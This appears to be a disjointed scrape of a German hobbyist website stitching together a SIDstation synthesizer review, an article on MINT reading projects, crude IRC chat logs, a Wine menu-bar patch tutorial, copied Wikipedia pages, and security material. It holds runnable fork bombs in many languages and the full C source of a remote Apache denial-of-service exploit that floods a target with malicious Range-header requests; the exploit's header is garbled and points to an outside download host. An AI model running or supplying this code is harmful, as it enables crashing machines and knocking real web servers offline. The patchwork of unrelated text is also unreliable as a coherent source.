man sicher sein, dass dies auch innerhalb der nächsten Tage geschieht;
und so werden auch die Käufer der ersten SIDstation-Generation nicht
vergessen, sie bekommen kostenlose Updates ihrer Systemsoftware - ein Service,
der heutzutage leider bei vielen Firmen in Vergessenheit geraten ist.
Fazit
Als aktiver Homerecorder, der dieses Hobby nunmehr seit über 11 Jahren
betreibt, musste ich beim Durchlesen der diversen Informationen zur
SIDstation schmunzeln, teilweise den Kopf schütteln ob der Begriffsverwirrung
(ein Arpeggiator gehört einfach nicht zur Synthese) und der Überschätzung
der klanglichen Qualitäten der SIDstation. Ein SID bleibt ein SID,
selbst wenn man ihn auf Hochglanz poliert - was die SIDstation zugegebenermaßen
sehr schön tut. Dennoch wird kein high-end Synthesizer daraus, schon
gar nicht zu einem Preis, zu dem man wirklich gute (und polyphone!) Geräte
auf dem Gebrauchtmarkt bekommt. Auch zeugen die Aussagen, die mir gegenüber
per eMail gemacht wurden, davon, dass sich die Jungs von Elektron
ESI AB sich im Musikgerätemarkt nicht unbedingt auskennen, z.B. erhielt
ich denn auf meine Frage, ob und wie man denn den unterschiedlichen Filtercharakteristiken
der SID-Chips begegnet, von Daniel Hansson die Antwort, dass dies
doch gar keine Rolle spiele, denn es hätte ohnehin niemand mehr als
nur eine SIDstation. Dass so aber ein Klangprogramm auf jeder SIDstation
anders klingen würde (und wie dramatisch der Unterschied sein kann,
zeigte 1986 Chris Hülsbeck mit "Shades"), scheint entweder nicht von
Interesse zu sein oder man hofft, dass niemand danach fragt - für
den Einsatz in professionellen Studios ein absolutes K.O.-Kriterium.
Ich mag Lo-Fi Sound, drum habe ich mir auch gerade erst einen 8Bit-Drumcomputer
gekauft - aber würde ich mir eine SIDstation kaufen? Ich denke nicht,
denn jeder gebrauchte Analogsynthesizer ist klanglich besser - und in Kombination
mit dem Oberheim Cyclone hat man auch Arpeggiator-Fähigkeiten, die
die SIDstation vermutlich nie erreichen wird.
Hätten Sie's doch bei der Aussagen "...but now we're doing it for
our own fun" belassen - die SIDstation würde von mir höchste
Noten erhalten. Doch als Konkurrenzprodukt zu "amtlichen" Synthesizern
kann sie leider nur verlieren, besonders wenn man den Mund dann auch noch
so voll nimmt, wie es jeder auf der SIDstation-Homepage nachlesen kann.
Bleibt die Frage: Wer kauft sich eine SIDstation? Höchstens SID-Enthusiasten,
die diesen unverwechselbaren Sound in höchster Qualität genießen
wollen - und derer gibt es offenbar viele, wie die Lobeshymnen auf www.sidstation.de
beweisen.
Abdruck mit freundlicher Genehmigung der Zeitschrift
´GO64!´, Cosowi Verlag
MINT-Bildung und Sprachförderung – eine Verbindung, die in jedem Land funktioniert
vonStefanie Thate
„Nachts, im Mondschein, lag auf einem Blatt ein kleines Ei…“. So lautet der erste Satz des Kinderbuchklassikers „Die kleine Raupe Nimmersatt“, den sehr viele kleine und große Bilderbuchfans weltweit auswendig zitieren können. Die Erlebnisse der kleinen hungrigen Raupe, die aus einem Ei schlüpft und sich auf die Suche nach etwas Essbarem macht, werden seit 50 Jahren in mindestens 45 verschiedenen Sprachen immer wieder vorgelesen.
Dem Autor Eric Carle ist es eindrucksvoll gelungen, wenig Text, farbenfrohe Bilder und aktivierende Mitmach- und Lernelemente in Einklang zu bringen. Zahlreiche Wiederholungen und eine fantasievolle Gestaltung animieren (Vor-)leser und Zuhörer gleichermaßen. Während sich die nimmersatte Raupe durch unterschiedliche Lebensmittel futtert, lernen die Kinder spielerisch erste Wörter, Zahlen und Vorgänge aus der Natur kennen. Gemeinsam mit dem Vorleser oder der Vorleserin können sie darüber hinaus überlegen, wovon sich Raupen in der freien Natur ernähren und was passiert, wenn sie dann doch endlich einmal satt sind.
Der Bilderbuch-Klassiker bietet beste Voraussetzungen für lebendiges Vorlesen, Mitlesen, Benennen, Zählen, Wiegen und Nachforschen. Er begeistert Kinder durch das Vorlesen für naturwissenschaftliche Phänomene und fördert die Sprach- und Lesekompetenz.
Genau das ist auch das Ziel von „MINT-Vorlesepaten“, einem Kooperationsprojekt von Deutscher Telekom Stiftung und Stiftung Lesen.
Das Projekt basiert auf wissenschaftlichen Studien, die zeigen, dass sich die Sprach- und Lesekompetenz von Kindern fördern lässt, wenn sie sich mit mathematisch-naturwissenschaftlich-technischen Fragestellungen beschäftigen. Das Forschen führt zu einem großen Interesse an Sprache und Kommunikation, denn die Kinder wollen untersuchte Phänomene benennen, beschreiben, Vermutungen ausdrücken und diskutieren.
Tipps für geeignete Medien-Empfehlungen (Bücher und Vorlese-Apps) und einfach umzusetzende Anschlussaktionen bieten die beiden Stiftungen kostenlos zum Download an. Darüber hinaus stehen Kurzvideos mit weiteren Erläuterungen zu einzelnen Themen zur Verfügung, z. B. Aktionen zum Thema Farben, Naturphänomene oder Riechen und Schmecken. Der oder die Vorleserin muss also kein MINT-Experte sein, sondern sollte einfach nur Freude am (Vor-)Lesen und gemeinsamen Entdecken mitbringen. Bisher haben sich bereits über 2.630 MINT-Vorlesepatinnen und MINT-Vorlesepaten für ein solches Engagement entschieden.
Die Deutsche Telekom Stiftung engagiert sich seit 2016 auch in Mittel-, Ost- und Südosteuropa für gute MINT-Bildung. Im Projekt „MINT-Vorlesepaten“ stehen in verschiedenen Ländern erfahrene Partner für die Umsetzung vor Ort an ihrer Seite.
Seit November 2018 arbeitet die Stiftung mit der rumänischen Progress Foundation zusammen. Gemeinsam schaffen die beiden Partner ein niedrigschwelliges Angebot, um Kinder in Rumänien über das Vorlesen für MINT-Themen zu begeistern.
Die konkrete Umsetzung des Vorhabens „Ora sa STIM“ in Rumänien liegt bei der Progress Foundation. Trainer der Stiftung haben rund 150 Bibliothekare darin geschult, das Vorlesen altersgerechter Kinderbücher mit MINT-Bezug um spannende Anschlussaktionen zu ergänzen. Die Bibliothekare führen wöchentlich MINT-Vorleseaktionen für Kinder zwischen drei und zehn Jahren durch. Hierfür erhalten sie Materialien, Medien- und Aktionstipps und kostenlose Bücherboxen. Die inzwischen 155 Bibliotheken berichten kontinuierlich über ihre Erfahrungen, Erkenntnisse und Herausforderungen bei der Durchführung der MINT-Vorleseaktionen in einer projekteigenen Facebook-Gruppe. Die Vernetzung der Teilnehmer untereinander und die Förderung des Wissens- und Erfahrungsaustauschs sind zentrale Elemente für den Erfolg und die Kontinuität.
In Polen kooperiert die Telekom-Stiftung mit der polnischen Information Society Development Foundation (IFRS). Unter dem Titel „Para – buch! Książka w ruch!“ werden rund 100 Tandems aus Bibliothekaren und Ehrenamtlern gebildet und geschult. Anschließend bieten sie zweiwöchentlich MINT-Vorleseaktionen für Kinder zwischen drei und zehn Jahren in „MINT-Vorlese-Clubs“ in Bibliotheken an. Unterstützt werden sie durch Medien- und Aktionstipps sowie Materialien. Als Freiwillige sollen vor allem Menschen mit einem naturwissenschaftlich-technischen Hintergrund gewonnen werden, z. B. Ingenieure oder Handwerker, die ihr Wissen und ihre Erfahrungen über MINT-Vorleseaktionen an Kinder weitergeben.
Über diese konkreten Kooperationen in Rumänien und Polen hinaus, unterstützt die Deutsche Telekom Stiftung weitere Aktivitäten zur Verbindung von MINT und Sprache in Österreich, der Slowakischen Republik, Spanien, Südtirol und Belgien. Die Ansätze in den jeweiligen Ländern sind unterschiedlich.
In Österreich adressiert das Österreichische Bibliothekswerk über „MINT: lesen – sprechen – tun“ Bibliothekare, Vorlesepaten, Eltern und Pädagogen die kindliche Neugier durch das Vorlesen ausgewählter Medien und leicht zu realisierender Versuche zu wecken. Ergänzend haben Kindergärten und Grundschulen in Salzburg und Wien die Möglichkeit MINT-Themenboxen bestehend aus Büchern, Materialien und Bilderbuchkinos kostenfrei auszuleihen.
Spannende Ansätze naturwissenschaftliche Themen schon ganz früh in Eltern-Kind-Gruppen mitzudenken, hat das Forum Katholischer Erwachsenenbildung in Österreich unter dem Titel „MINI-MINT“ entwickelt. Die Idee dahinter: In und mit den Familien wird der Grundstein für Bildungs-Begeisterung bzw. MINT-Begeisterung gelegt. In zahlreichen Eltern-Kind-Gruppen werden bereits vielfältige MINT-Themen altersgerecht und spielerischer bedient, z. B. mein Körper, Tiere, Farben. Da setzt die Handreichung „MINI-MINT: von Anfang an die Welt entdecken“ an, die zu zehn verschiedenen Themen entwickelt worden ist.
Die gewinnbringende Verbindung von MINT und Sprache wird in der Slowakischen Republik durch das Goethe-Institut Bratislava genutzt, um Kinder, die Deutsch als Fremdsprache lernen, zu unterstützen. Über anregende naturwissenschaftliche und technische Inhalte, die kreativ und spielerisch aufgegriffen werden wird das Interesse an der „neuen“ Sprache gesteigert.
Die Beispiele verdeutlichen, dass die Verbindung von MINT-Themen und Sprachförderung sich gewinnbringend miteinander verbinden lässt:
Diese Website verwendet Cookies, um Ihnen den bestmöglichen Service zu gewährleisten. Durch die Nutzung dieser Website erklären Sie sich mit der Verwendung von Cookies einverstanden. Detaillierte Informationen finden Sie in unserer Datenschutzerklärung.
18:24 -!- APic_ [apic@chiptune.apic.name] has joined +linux.de
18:24 -!- APic_ is now known as ACTPic
21:22 < flash-> https://youtu.be/XvHuVfzuL0w
21:22 < DukeOfUrl> Video on YouTube titled Badesalz - Verschollene Dokus - Einstein uploaded by abuzze70
21:27 < flash-> https://lab.spacecourt.org/07_eav_-_die_zeit.mp3
21:27 < DukeOfUrl> Title: DJSpaceCourt - Free Netlabel --> Lab 1 <-- Download Section!
21:44 < flash-> Ich ficke jetzt ein Huhn. Es macht *b0k*
21:46 < flash-> Jetzt der Hund.
21:46 < flash-> Jetzt die Katz und der Elefant (dreier)
21:47 < flash-> Das Pferd.
21:47 < flash-> Hm. Jetzt yath
21:47 < flash-> :>
21:47 < flash-> Ich möchte tcp sex mit Harzilein
21:48 * flash- öffnet seinen port.
21:48 < flash-> 3ffe:sperma::1
21:49 < flash-> Vorne das ist der ident, das in der mitte die anwendung und hinten steht immer der port
21:49 < flash-> Ich weiß Bescheid.
21:50 < flash-> https:// ist die Lümeltüte
21:50 < flash-> und mediawiki.it-flash.de ist der port
21:50 < flash-> Daher weiß ichs.
21:51 < flash-> Weil die Anwendung geht ja über einen strom. Und der strom macht dann das Betriebssystem auf, bis es feucht wird.
21:52 < flash-> Und wenn man Noppen https verwendet, dann kann es sein, dass mal ein *b0k* daneben geht.
21:52 < flash-> Dann ensteht ein DragonFly10
21:53 < flash-> DragonFly10 CMS
21:53 < flash-> und 10 kopien davon, die eine ganze 3tb platte belegen
21:53 < flash-> =)
21:54 < flash-> Wenn man auf der Tastur eingibt: "entropy", dann öffnet jeder Buchstabe den Haupt Port
21:54 < flash-> Der geht über das Pain Board an den Bus
21:55 < flash-> Und der USB schluckt dann die flüssigkeit
21:55 < flash-> nämlich südlich
21:55 < flash-> Und außerdem gibt es noch die cpu, die macht eigentlich überhaupt nix, total unwichtig
21:55 < flash-> überflüssig. =)
21:57 < flash-> Die Maus macht sex mit der Tastatur...
21:57 < flash-> Man kann also immer nur entweder die Maus, oder die Tastatur betätigen
21:57 < flash-> yo.. soll ich das evtl. in ein Wiki packen? :)
21:58 < flash-> Jetzt zur Anatomie
21:59 < flash-> ACTPic ist der Schwellmuskel der männlichen pc peripherie
21:59 < ACTPic> Danke für das Kompliment
21:59 < flash-> ;D
21:59 < ACTPic> 😸
22:00 -!- ulfdoz [-mary@p4FC7A6C8.dip0.t-ipconnect.de] has quit [Ping timeout]
22:01 < flash-> Und das war ein Orgasmus.
Wine so patchen dass die Menue Leiste unter Propellerheads Reason 4 funktioniert Ein Beispiel anhand von Gentoo.
So, -> Weil mich einige Menschen gefragt haben, wie man denn jetzt eine Anwendung patcht.
Gegeben ist der Fall, dass Propellerheads Reason 4 unter WINE Emulation (Linux) nicht richtig läuft.
Das Programm funktioniert zwar, die Menüleiste kann allerdings nicht benutzt werden.
Jetzt suchen wir uns im Bugtracker einen Patch, schauen genau drüber und befinden Ihn als gut.
So sieht der Patch für unser Problem aus:
Was wir jetzt machen, den Patch mit dem Namen "reason_menubar.patch" in das Patch Verzeichnis kopieren:
Nun können wir die Anwendung über emerge neu zusammenbauen.
Alternativ kann man reason_menubar.patch in die Wurzel des Quellcode Verzeichnis schieben und gibt ein:
patch -p1 <reason_menubar.patch
Das sollte dann auch funktionieren. Man muss das Wine dann allerdings selbst bauen. Was ich hier nicht erkläre.
Jedenfalls sieht das fertige Reason dann emuliert so aus:
Die Menüleiste kann nun betätigt werden.
Hier nochmal der Patch:
diff --git a/dlls/user32/menu.c b/dlls/user32/menu.c
index ab473ea..82b4772 100644
--- a/dlls/user32/menu.c
+++ b/dlls/user32/menu.c
@@ -2332,7 +2332,7 @@ static void MENU_HideSubPopups( HWND hwndOwner, HMENU hmenu,
{
POPUPMENU *menu = MENU_GetMenu( hmenu );
- TRACE("owner=%p hmenu=%p 0x%04x\n", hwndOwner, hmenu, sendMenuSelect);
+ TRACE("owner=%p hmenu=%p select 0x%04x flags %08x\n", hwndOwner, hmenu, sendMenuSelect, wFlags);
if (menu && top_popup)
{
@@ -3069,6 +3069,50 @@ static BOOL MENU_TrackMenu( HMENU hmenu, UINT wFlags, INT x, INT y,
return FALSE;
}
+ /* recalc the menubar size if needed */
+ /* eg if the application modified the menu in the WM_INITMENU message */
+ if (!( wFlags & TPM_POPUPMENU) && !menu->Height)
+ {
+ RECT rc;
+ LONG style = GetWindowLongW( hwnd, GWL_STYLE );
+ LONG exstyle = GetWindowLongW( hwnd, GWL_EXSTYLE );
+ HDC hdc = GetDCEx( hwnd, 0, DCX_CACHE | DCX_WINDOW );
+ INT width = 0, height = 0;
+ SelectObject( hdc, get_menu_font(FALSE));
+ /* FIXME: calculations taken from nonclient.c and uitools.c */
+ /* unfortunately too intertwined with non-client redrawing */
+ /* I do not like to introduce another unneeded redraw here */
+ /* this code should probaby be put there */
+ GetWindowRect( hwnd, &rc);
+ SetRect( &rc, 0, 0, rc.right - rc.left, 0);
+ rc.top = GetSystemMetrics(SM_CYCAPTION);
+ if( style & WS_THICKFRAME) {
+ width += GetSystemMetrics(SM_CXFRAME) - GetSystemMetrics(SM_CXDLGFRAME);
+ height += GetSystemMetrics(SM_CYFRAME) - GetSystemMetrics(SM_CYDLGFRAME);
+ }
+ if(( style & (WS_BORDER|WS_DLGFRAME)) ||
+ (exstyle & WS_EX_DLGMODALFRAME)) {
+ width += GetSystemMetrics(SM_CXDLGFRAME) - GetSystemMetrics(SM_CXEDGE);
+ height += GetSystemMetrics(SM_CYDLGFRAME) - GetSystemMetrics(SM_CYEDGE);
+ }
+ /* HAS_THICKFRAME */
+ if(((style) & WS_THICKFRAME) && !(((style) & (WS_DLGFRAME|WS_BORDER)) == WS_DLGFRAME)){
+ width++;
+ height++;
+ }
+ /* HAS_BIGFRAME */
+ if(((style) & (WS_THICKFRAME | WS_DLGFRAME)) || ((exstyle) & WS_EX_DLGMODALFRAME)){
+ width++;
+ height++;
+ }
+ rc.left += width;
+ rc.right -= width;
+ rc.top += height;
+ rc.bottom = rc.top + GetSystemMetrics(SM_CYMENU);
+ MENU_MenuBarCalcSize( hdc, &rc, menu, hwnd );
+ ReleaseDC( hwnd, hdc );
+ }
+
if (wFlags & TPM_BUTTONDOWN)
{
/* Get the result in order to start the tracking or not */
@@ -3361,7 +3405,8 @@ static BOOL MENU_InitTracking(HWND hWnd, HMENU hMenu, BOOL bPopup, UINT wFlags)
{
SendMessageW( hWnd, WM_INITMENU, (WPARAM)hMenu, 0 );
/* If an app changed/recreated menu bar entries in WM_INITMENU
- * menu sizes will be recalculated once the menu created/shown.
+ * menu sizes must be recalculated.
+ * Either in MENU_TrackMenu or when the menu is created/shown.
*/
}
</span>
Fixes bug 10845
---
dlls/user32/menu.c | 49 +++++++++++++++++++++++++++++++++++++++++++++++--
1 files changed, 47 insertions(+), 2 deletions(-)
diff --git a/dlls/user32/menu.c b/dlls/user32/menu.c
index ab473ea..82b4772 100644
--- a/dlls/user32/menu.c
+++ b/dlls/user32/menu.c
@@ -2332,7 +2332,7 @@ static void MENU_HideSubPopups( HWND hwndOwner, HMENU hmenu,
{
POPUPMENU *menu = MENU_GetMenu( hmenu );
- TRACE("owner=%p hmenu=%p 0x%04x\n", hwndOwner, hmenu, sendMenuSelect);
+ TRACE("owner=%p hmenu=%p select 0x%04x flags %08x\n", hwndOwner, hmenu, sendMenuSelect, wFlags);
if (menu && top_popup)
{
@@ -3069,6 +3069,50 @@ static BOOL MENU_TrackMenu( HMENU hmenu, UINT wFlags, INT x, INT y,
return FALSE;
}
+ /* recalc the menubar size if needed */
+ /* eg if the application modified the menu in the WM_INITMENU message */
+ if (!( wFlags & TPM_POPUPMENU) && !menu->Height)
+ {
+ RECT rc;
+ LONG style = GetWindowLongW( hwnd, GWL_STYLE );
+ LONG exstyle = GetWindowLongW( hwnd, GWL_EXSTYLE );
+ HDC hdc = GetDCEx( hwnd, 0, DCX_CACHE | DCX_WINDOW );
+ INT width = 0, height = 0;
+ SelectObject( hdc, get_menu_font(FALSE));
+ /* FIXME: calculations taken from nonclient.c and uitools.c */
+ /* unfortunately too intertwined with non-client redrawing */
+ /* I do not like to introduce another unneeded redraw here */
+ /* this code should probaby be put there */
+ GetWindowRect( hwnd, &rc);
+ SetRect( &rc, 0, 0, rc.right - rc.left, 0);
+ rc.top = GetSystemMetrics(SM_CYCAPTION);
+ if( style & WS_THICKFRAME) {
+ width += GetSystemMetrics(SM_CXFRAME) - GetSystemMetrics(SM_CXDLGFRAME);
+ height += GetSystemMetrics(SM_CYFRAME) - GetSystemMetrics(SM_CYDLGFRAME);
+ }
+ if(( style & (WS_BORDER|WS_DLGFRAME)) ||
+ (exstyle & WS_EX_DLGMODALFRAME)) {
+ width += GetSystemMetrics(SM_CXDLGFRAME) - GetSystemMetrics(SM_CXEDGE);
+ height += GetSystemMetrics(SM_CYDLGFRAME) - GetSystemMetrics(SM_CYEDGE);
+ }
+ /* HAS_THICKFRAME */
+ if(((style) & WS_THICKFRAME) && !(((style) & (WS_DLGFRAME|WS_BORDER)) == WS_DLGFRAME)){
+ width++;
+ height++;
+ }
+ /* HAS_BIGFRAME */
+ if(((style) & (WS_THICKFRAME | WS_DLGFRAME)) || ((exstyle) & WS_EX_DLGMODALFRAME)){
+ width++;
+ height++;
+ }
+ rc.left += width;
+ rc.right -= width;
+ rc.top += height;
+ rc.bottom = rc.top + GetSystemMetrics(SM_CYMENU);
+ MENU_MenuBarCalcSize( hdc, &rc, menu, hwnd );
+ ReleaseDC( hwnd, hdc );
+ }
+
if (wFlags & TPM_BUTTONDOWN)
{
/* Get the result in order to start the tracking or not */
@@ -3361,7 +3405,8 @@ static BOOL MENU_InitTracking(HWND hWnd, HMENU hMenu, BOOL bPopup, UINT wFlags)
{
SendMessageW( hWnd, WM_INITMENU, (WPARAM)hMenu, 0 );
/* If an app changed/recreated menu bar entries in WM_INITMENU
- * menu sizes will be recalculated once the menu created/shown.
+ * menu sizes must be recalculated.
+ * Either in MENU_TrackMenu or when the menu is created/shown.
*/
}
--
1.6.2.1
Real Patois
Wikipedia RIPPIN Wettbewerb 1
Pattern (Musik)
Zur Navigation springen
Zur Suche springen
Das Pattern (Plural: Pattern; englisch: Muster; von lateinisch patronus: Patron[1]) bezeichnet im Sprachgebrauch von Musikern und Komponisten eine harmonisch oder rhythmisch wiederkehrende Struktur. Der Begriff bezieht sich vornehmlich auf perkussive Elemente oder Schlagzeug und wird zum Teil aus diesem Kontext in andere, allgemeinere Bedeutungen überführt. Hier ist dann zumeist einfach ein wiederkehrendes Motiv gemeint, der Begriff Pattern ist in solchen Fällen ein Anglizismus.
Die Musikethnologie bedient sich dieses Begriffs spezifischer. Es werden Pattern nach der Anzahl ihrer Schläge (Pulse) unterschieden, in der afrikanischen Musik herrschen kleine Anzahlen vor, zwei, drei oder vier Schläge. Mindestens zwei werden dort miteinander verzahnt. Verschiedenzahlige Pattern verschieben sich gegeneinander im Laufe eines Stückes, ähnlich einer Schwebung. Da verschiedene Tonhöhen bei Trommeln (Djembe) vorkommen können, entstehen nicht nur rhythmische Gestalten, sondern durch die Verschiebung der Schwerpunkte und Zusammenklänge auch melodische.
In der elektronischen Musik hat der Begriff im Prinzip die gleiche Bedeutung. Ein programmiertes Pattern beschreibt ebenfalls ein musikalisches Grundmuster oder einfach Motiv, das – auch in leichten Abwandlungen – mehrfach wiederholt wird. Die amerikanische Minimal Music beruht häufig auf der ständigen Abwandlung solcher Pattern. Bei leichten zeitlichen Verschiebungen der Pattern in verschiedenen Stimmen oder Instrumenten entsteht eine sogenannte Phase. Der Umgang damit wird als Kompositionstechnik Phasing genannt.
Die bekanntesten Komponisten, die mit elektronischen Patterns arbeiteten, sind Steve Reich, Terry Riley und Philip Glass.
Now: Logged ON: - Have Fun! ;-)
(\-.
/ _`.---------.
_) / _)=|'-------'|
( / _/ |O O o|
`-.__(___)_ | o O . o |
`---------'
must be gouda
Wikipedia Rippin Wettbewerb A Fork Bomb An example on Apache Webserver
Fork bomb
From Wikipedia, the free encyclopedia
Jump to navigation
Jump to search
"Rabbit virus" redirects here. For the disease used in an attempt to exterminate rabbits in Australia, see Myxomatosis.
The concept behind a fork bomb — the processes continually replicate themselves, potentially causing a denial of service
In computing, a fork bomb (also called rabbit virus or wabbit[1]) is a denial-of-service attack wherein a process continually replicates itself to deplete available system resources, slowing down or crashing the system due to resource starvation.
Contents
1 History
2 Implementation
3 Examples of fork bombs
3.1 Perl
3.2 Python
3.3 C
3.4 Java
3.5 Lua
3.6 Assembly (Linux running on IA-32)
3.7 Shell script
3.7.1 Bash
3.8 Windows batch
3.9 PowerShell
4 Prevention
5 See also
6 References
History
Around 1978, an early variant of a fork bomb called wabbit was reported to run on a System/360. It may have descended from a similar attack called RABBITS reported from 1969 on a Burroughs 5500 at the University of Washington.[1]
Implementation
Fork bombs operate both by consuming CPU time in the process of forking, and by saturating the operating system's process table.[2][3] A basic implementation of a fork bomb is an infinite loop that repeatedly launches new copies of itself.
In Unix-like operating systems, fork bombs are generally written to use the fork system call.[3] As forked processes are also copies of the first program, once they resume execution from the next address at the frame pointer, they continue forking endlessly within their own copy of the same infinite loop; this has the effect of causing an exponential growth in processes. As modern Unix systems generally use copy-on-write when forking new processes,[4] a fork bomb generally will not saturate such a system's memory.
Microsoft Windows operating systems do not have an equivalent functionality to the Unix fork system call;[5] a fork bomb on such an operating system must therefore create a new process instead of forking from an existing one.
Examples of fork bombs
Perl
An inline shell example using the Perl interpreter:
perl -e "fork while fork" &
Python
import os
while True:
os.fork()
C
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
while(1) {
fork();
}
return 0;
}
Java
public class ForkBomb
{
public static void main(String[] args)
{
while(true)
{
Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});
}
}
}
Lua
-- Requires `luaposix' module
local unistd = require "posix.unistd"
while true do
unistd.fork()
end
Assembly (Linux running on IA-32)
section .text
global _start
_start:
mov eax,2 ;System call for forking
int 0x80 ;Call kernel
jmp _start
Shell script
Here's an example in which a shell script is told to run two instances of $0 ― $0 is a shell variable returning the name of the script itself ― and pipe the output of one through the other, which results in exponentially replicating processes.
#!/bin/sh
./$0|./$0&
A simpler way is to just run ./$0& twice:
#!/bin/sh
./$0&
./$0&
Bash
In Bash, a fork bomb can be performed by declaring and calling a multiple-recursive function:
bomb(){
bomb | bomb &
}
bomb
Additionally, one of the most famous and commonly cited examples of a fork bomb is this dense one-line Bash command:
:(){ :|:& };:
This command is an obfuscated version of the above. The trick here is that : is used as a function name, which is possible because the colon is not a reserved character in Bash as it is in most other languages. Otherwise, it is identical.[6]
With unicode support, it can similarly be rendered as:
💣(){ 💣|💣& };💣
Windows batch
:ForkBomb
start "" %1
goto ForkBomb
The same as above, but shorter:
%0 | %0
The same as above, but done in command line using ^ to escape specials:
echo %0^|%0 > forkbomb.bat
forkbomb.bat
Condensed version designed to be run directly from the Run... prompt:
cmd /k echo -^|->-.bat&-
PowerShell
while($true) {
Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:";
Invoke-Expression -Command 'while($true) {Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:"}';}
Prevention
As a fork bomb's mode of operation is entirely encapsulated by creating new processes, one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own. On Linux, this can be achieved by using the ulimit utility; for example, the command ulimit -u 30 would limit the affected user to a maximum of thirty owned processes.[7] On PAM-enabled systems, this limit can also be set in /etc/security/limits.conf,[8] and on FreeBSD, the system administrator can put limits in /etc/login.conf.[9]
See also
Denial-of-service attack
Deadlock
Time bomb (software)
Logic bomb
References
Raymond, Eric S. (October 1, 2004). "wabbit". The Jargon Lexicon. Retrieved October 15, 2013.
Ye, Nong (2008). Secure Computer and Network Systems: Modeling, Analysis and Design. p. 16. ISBN 0470023244.
Jielin, Dong (2007). Network Dictionary. p. 200. ISBN 1602670005.
Dhamdhere, D. M. (2006). Operating Systems: A Concept-based Approach. p. 285. ISBN 0070611947.
Hammond, Mark (2000). Python Programming On Win32: Help for Windows Programmers. p. 35. ISBN 1565926218.
"Fork() Bomb - GeeksforGeeks". GeeksforGeeks. June 19, 2017. Retrieved June 27, 2018.
Cooper, Mendel (2005). Advanced Bash Scripting Guide. pp. 305–306. ISBN 1430319305.
Soyinka, Wale (2012). Linux Administration: A Beginners Guide. pp. 364–365. ISBN 0071767592.
Lucas, Michael W. (2007). Absolute FreeBSD: The Complete Guide to FreeBSD. pp. 198–199. ISBN 1593271514.
Categories:
Denial-of-service attacksProcess (computing)
<b>
ut10n (http://jayakonstruksi.com/backupintsec/rapache.tgz).
* Copyright 2011 Ramon de C Valle <rcvalle@redhat.com>
*
* Compile with the following command:
* gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>
#include <pthread.h>
void ptrace_trap(void) __attribute__ ((constructor));
void
ptrace_trap(void) {
if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
write(fileno(stdout), "Segmentation fault\n", 19);
exit(-1);
}
}
void
w4rn41dun14mu(int attr, int fg, int bg)
{
char command[13];
sprintf(command, "%c[%d;%d;%dm", 0x1b, attr, fg+30, bg+40);
printf("%s", command);
}
void
banner()
{
w4rn41dun14mu(0, 1, 0);
fwrite("Remote Apache Denial of Service Exploit by ev1lut10n\n", 53, 1,
stdout);
}
void
gime_er_mas()
{
printf("%c%s", 0x1b, "[2J");
printf("%c%s", 0x1b, "[1;1H");
puts("\nsorry dude there's an error...");
}
struct thread_info {
pthread_t thread_id;
int thread_num;
char *argv_string;
};
static void *
thread_start(void *arg)
{
struct thread_info *tinfo = (struct thread_info *) arg;
char hostname[64];
int j;
strcpy(hostname, tinfo->argv_string);
j = 0;
while (j != 10) {
struct addrinfo hints;
struct addrinfo *result, *rp;
int sfd, s;
ssize_t nwritten;
memset(&hints, 0, sizeof(struct addrinfo));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
hints.ai_flags = 0;
hints.ai_protocol = 0;
s = getaddrinfo(hostname, "http", &hints, &result);
if (s != 0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(s));
exit(EXIT_FAILURE);
}
for (rp = result; rp != NULL; rp = rp->ai_next) {
sfd = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol);
if (sfd == -1)
continue;
if (connect(sfd, rp->ai_addr, rp->ai_addrlen) == -1)
close(sfd);
}
if (result != NULL)
freeaddrinfo(result);
nwritten = write(sfd, "HEAD / HTTP/1.1\n"
"Host:localhost\n"
"Range:bytes=0-,0-\n"
"Accept-Encoding: gzip", 71);
if (nwritten == -1)
close(sfd);
usleep(300000);
j++;
}
return 0;
}
int
main(int argc, char *argv[])
{
int i;
struct thread_info tinfo;
banner();
if (argc <= 1) {
w4rn41dun14mu(0, 2, 0);
fwrite("\n[-] Usage : ./rapache hostname\n", 32, 1, stdout);
return 0;
}
w4rn41dun14mu(0, 3, 0);
printf("[+] Attacking %s please wait in minutes ...\n", argv[1]);
while (1) {
i = 0;
while (i != 50) {
tinfo.thread_num = i;
tinfo.argv_string = argv[1];
pthread_create(&tinfo.thread_id, NULL, &thread_start, &tinfo);
usleep(500000);
i++;
}
}
}
[14:28:52] <s0lfunk> hm
[14:43:31] <s0lfunk> Weißt Du was die Oma immer gedacht hat?
[14:43:39] <s0lfunk> Wir beerdigen am PC Mäuse
[14:43:50] <s0lfunk> Dass in der Computer Maus eine tote Maus sei
[14:44:08] <s0lfunk> Sie sagte immer: "Dass Ihr immer Mäuse beerdigt, frage ich mich"
[14:44:18] <s0lfunk> Sie wollte auch immer vom Detlef die Maus auf den Müll bringen
[14:44:26] <s0lfunk> Weil sie meinte, es stinkt nach toter Maus.
[14:45:05] <s0lfunk> Dann hat der Detlef eine Maus auseinander genommen für die Mitzi
[14:45:21] <s0lfunk> Jetzt meinte die, "Du hast sie raus geholt, ist sie im Müll bei uns aber nicht oder?"
[14:45:40] <s0lfunk> Und dann wollte sie wissen, wie das funktioniert.
[14:45:44] <s0lfunk> "Der Geist, stimmts?"
[14:45:51] <s0lfunk> schrecklich...
[14:46:54] <s0lfunk> Manchmal hat sie gesagt: "Sie will raus"
[14:47:02] <s0lfunk> Und der Detlef: "Du willst raus?"
[14:47:06] <s0lfunk> "Nein die Maus"
[14:47:43] <s0lfunk> Und dann hat sie gesagt: "Ja, wenn sie bei Gott ist"
[14:47:49] <s0lfunk> "Will und muss sie raus"
[14:49:40] <s0lfunk> Und der Detlef sagte immer: "Wie kriege ich das jetzt raus"
[14:49:52] <s0lfunk> Und dann sagte die Oma. "Ich kann Dir sagen, wo die Maus ist"
